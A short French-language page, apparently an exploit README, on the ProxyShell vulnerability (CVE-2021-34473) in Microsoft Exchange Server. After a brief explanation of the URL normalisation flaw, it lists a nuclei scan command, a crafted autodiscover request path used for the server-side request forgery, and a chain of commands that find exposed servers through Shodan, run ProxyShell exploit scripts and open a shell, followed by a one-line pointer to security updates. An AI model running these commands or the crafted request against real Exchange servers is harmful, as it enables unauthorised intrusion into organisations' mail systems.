
CVE-2021-34473 Vulnérabilité d'exécution de code à distance dans Microsoft Exchange Server
CVE-2021-34473 Vulnérabilité d'exécution de code à distance sur Microsoft Exchange Server. Cette normalisation défectueuse des URL nous permet d'accéder à une URL arbitraire du backend tout en s'exécutant en tant que compte machine du serveur Exchange. Bien que ce bogue ne soit pas aussi puissant que le SSRF dans ProxyLogon, et que nous ne puissions manipuler que la partie chemin de l'URL, il est suffisamment puissant pour mener d'autres attaques avec un accès arbitraire au backend.
scanner nuclei pour ProxyShell RCE (CVE-2021-34423, CVE-2021-34473, CVE-2021-31207) découvert par orange tsai lors du Pwn2Own, qui affecte Microsoft Exchange Server.
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
Appliquez les mises à jour de sécurité trouvées ici : CVE-2021-34473